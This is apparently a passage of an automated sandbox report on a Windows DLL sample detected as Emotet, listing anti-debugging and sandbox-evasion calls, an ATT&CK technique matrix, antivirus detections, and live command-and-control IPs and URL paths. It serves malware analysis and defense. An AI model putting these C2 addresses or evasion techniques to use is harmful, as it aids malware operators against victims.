0_2_6E4B6620

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4DD1EE FindFirstFileExA,	0_2_6E4DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4DD1EE FindFirstFileExA,	2_2_6E4DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E1A80 FindFirstFileW,	14_2_031E1A80

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: rundll32.exe, 0000000E.00000002.1181015282.0000000003648000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.977901726.000001FFDD0A7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000002.00000003.713312417.00000000035AD000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000019.00000002.977772992.000001FFDD058000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWp94

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4CED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E4CED41

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4C846D GetProcessHeap,HeapFree,InterlockedPushEntrySList,

0_2_6E4C846D

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4B6620 rdtscp

0_2_6E4B6620

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_013FDE10 mov eax, dword ptr fs:[00000030h]	0_2_013FDE10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4B6620 mov ecx, dword ptr fs:[00000030h]	0_2_6E4B6620
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4C849D mov esi, dword ptr fs:[00000030h]	0_2_6E4C849D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4B6510 mov eax, dword ptr fs:[00000030h]	0_2_6E4B6510
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4B8A50 mov eax, dword ptr fs:[00000030h]	0_2_6E4B8A50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4D69AA mov eax, dword ptr fs:[00000030h]	0_2_6E4D69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4B6620 mov ecx, dword ptr fs:[00000030h]	2_2_6E4B6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4C849D mov esi, dword ptr fs:[00000030h]	2_2_6E4C849D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4B6510 mov eax, dword ptr fs:[00000030h]	2_2_6E4B6510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4B8A50 mov eax, dword ptr fs:[00000030h]	2_2_6E4B8A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4D69AA mov eax, dword ptr fs:[00000030h]	2_2_6E4D69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00EFDE10 mov eax, dword ptr fs:[00000030h]	3_2_00EFDE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0092DE10 mov eax, dword ptr fs:[00000030h]	6_2_0092DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00F9DE10 mov eax, dword ptr fs:[00000030h]	9_2_00F9DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031EDE10 mov eax, dword ptr fs:[00000030h]	14_2_031EDE10

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4CED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E4CED41
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4C5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E4C5239
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4C5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E4C5ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4CED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E4CED41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4C5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E4C5239
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4C5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E4C5ABD

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1

Jump to behavior

Source: rundll32.exe, 0000000E.00000002.1181270141.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 0000000E.00000002.1181270141.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000000E.00000002.1181270141.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000000E.00000002.1181270141.0000000003AC0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E4E5F10
Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6E4E57AC
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E4E5DE7
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E4DDD93
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E4E5A6F
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E4E5A24
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E4DE2F8
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E4E5B0A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E4E5B97
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E4E6017
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E4E60E4
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E4E597B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6E4E5F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6E4E57AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E4E5DE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E4DDD93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E4E5A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E4E5A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E4DE2F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E4E5B0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E4E5B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E4E6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E4E60E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E4E597B

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4C5916 cpuid

0_2_6E4C5916

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4C5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E4C5C3C

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.7b43e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.9e4140.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b4350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3264268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b4350.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.7b43e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3264268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.35e4730.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.9e4140.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.35e4730.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.728810783.0000000003565000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.777849090.000000000324A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.765628478.000000000166D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.765555837.000000000089A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.726530504.00000000009CA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.753626316.000000000079A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1180916673.00000000035CA000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Masquerading2	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	System Information Discovery134	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dUGnMYeP1C.dll	20%	Virustotal		Browse
dUGnMYeP1C.dll	23%	ReversingLabs	Win32.Infostealer.Convagent

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.3510000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
9.2.rundll32.exe.f80000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.2.loaddll32.exe.13e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.31d0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.ee0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.7e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
6.2.rundll32.exe.910000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
14.2.rundll32.exe.35e4730.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://www.tiktok.com/legal/report/	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
https://51.178.61.60/InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgU	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://51.178.61.60/	10%	Virustotal		Browse
https://51.178.61.60/	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://51.178.61.60/InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgUC	0%	Avira URL Cloud	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://51.178.61.60/InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgU	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.tiktok.com/legal/report/	svchost.exe, 00000019.00000003.959252620.000001FFDD78F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000019.00000002.978005532.000001FFDD0EF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://51.178.61.60/	rundll32.exe, 0000000E.00000002.1180973185.000000000361A000.00000004.00000020.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000019.00000003.959264730.000001FFDD7A0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.959252620.000001FFDD78F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://51.178.61.60/InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgUC	rundll32.exe, 0000000E.00000002.1180973185.000000000361A000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	524858
Start date:	19.11.2021
Start time:	00:58:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	dUGnMYeP1C (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@27/0@0/20
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.6% (good quality ratio 17.4%) Quality average: 68.6% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 81% Number of executed functions: 48 Number of non-executed functions: 279
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.54.110.249 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:01:38	API Interceptor	8x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
	nXOpgPAbKC.dll	Get hash	malicious	Browse
	yezVNLNobB.dll	Get hash	malicious	Browse
	rRX4GBcJKK.dll	Get hash	malicious	Browse
196.44.98.190	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
	eyPPiz3W6u.dll	Get hash	malicious	Browse
	HjYSwxqyUn.dll	Get hash	malicious	Browse
	f47YPsvRI3.dll	Get hash	malicious	Browse
	2n64VXT08V.dll	Get hash	malicious	Browse
	qUr4bXsweR.dll	Get hash	malicious	Browse
	52O6evfqQT.dll	Get hash	malicious	Browse
	ONEitXKvz6.dll	Get hash	malicious	Browse
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse
	nXOpgPAbKC.dll	Get hash	malicious	Browse
	yezVNLNobB.dll	Get hash	malicious	Browse
	rRX4GBcJKK.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	9fC0as7YLE.dll	Get hash	malicious	Browse	66.42.57.149
	FIyE6huzxV.dll	Get hash	malicious	Browse	66.42.57.149
	V0gZWRXv8d.dll	Get hash	malicious	Browse	66.42.57.149
	t5EuQW2GUF.dll	Get hash	malicious	Browse	66.42.57.149
	uh1WyesPlh.dll	Get hash	malicious	Browse	66.42.57.149
	8rryPzJR1p.dll	Get hash	malicious	Browse	66.42.57.149
	a65FgjVus4.dll	Get hash	malicious	Browse	66.42.57.149
	bWjYh6H8wk.dll	Get hash	malicious	Browse	66.42.57.149
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	66.42.57.149
	eyPPiz3W6u.dll	Get hash	malicious	Browse	66.42.57.149
	HjYSwxqyUn.dll	Get hash	malicious	Browse	66.42.57.149
	f47YPsvRI3.dll	Get hash	malicious	Browse	66.42.57.149
	2n64VXT08V.dll	Get hash	malicious	Browse	66.42.57.149
	qUr4bXsweR.dll	Get hash	malicious	Browse	66.42.57.149
	52O6evfqQT.dll	Get hash	malicious	Browse	66.42.57.149
	ONEitXKvz6.dll	Get hash	malicious	Browse	66.42.57.149
	F2433DFBA69148A0C3A5A5951D360B6C3C045090DE06F.exe	Get hash	malicious	Browse	149.28.253.196
	jQ32XS2Lgf.exe	Get hash	malicious	Browse	216.128.137.31
	QbXMqZr3bx.exe	Get hash	malicious	Browse	216.128.137.31
	Whg8jgqeOs.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	196.44.98.190
	eyPPiz3W6u.dll	Get hash	malicious	Browse	196.44.98.190
	HjYSwxqyUn.dll	Get hash	malicious	Browse	196.44.98.190
	f47YPsvRI3.dll	Get hash	malicious	Browse	196.44.98.190
	2n64VXT08V.dll	Get hash	malicious	Browse	196.44.98.190
	qUr4bXsweR.dll	Get hash	malicious	Browse	196.44.98.190
	52O6evfqQT.dll	Get hash	malicious	Browse	196.44.98.190
	ONEitXKvz6.dll	Get hash	malicious	Browse	196.44.98.190
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	196.44.98.190
	nXOpgPAbKC.dll	Get hash	malicious	Browse	196.44.98.190
	yezVNLNobB.dll	Get hash	malicious	Browse	196.44.98.190
	rRX4GBcJKK.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	yFAXc9z51V.dll	Get hash	malicious	Browse	51.178.61.60
	9fC0as7YLE.dll	Get hash	malicious	Browse	51.178.61.60
	FIyE6huzxV.dll	Get hash	malicious	Browse	51.178.61.60
	V0gZWRXv8d.dll	Get hash	malicious	Browse	51.178.61.60
	t5EuQW2GUF.dll	Get hash	malicious	Browse	51.178.61.60
	uh1WyesPlh.dll	Get hash	malicious	Browse	51.178.61.60
	8rryPzJR1p.dll	Get hash	malicious	Browse	51.178.61.60
	a65FgjVus4.dll	Get hash	malicious	Browse	51.178.61.60
	bWjYh6H8wk.dll	Get hash	malicious	Browse	51.178.61.60
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	51.178.61.60
	eyPPiz3W6u.dll	Get hash	malicious	Browse	51.178.61.60
	02D6463C8D80183F843D874AB427C11FC47B6B9CE4726.exe	Get hash	malicious	Browse	51.178.61.60
	HjYSwxqyUn.dll	Get hash	malicious	Browse	51.178.61.60
	f47YPsvRI3.dll	Get hash	malicious	Browse	51.178.61.60
	2n64VXT08V.dll	Get hash	malicious	Browse	51.178.61.60
	qUr4bXsweR.dll	Get hash	malicious	Browse	51.178.61.60
	52O6evfqQT.dll	Get hash	malicious	Browse	51.178.61.60
	ONEitXKvz6.dll	Get hash	malicious	Browse	51.178.61.60
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	51.178.61.60
	nXOpgPAbKC.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.178852688448735
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Clipper DOS Executable (2020/12) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
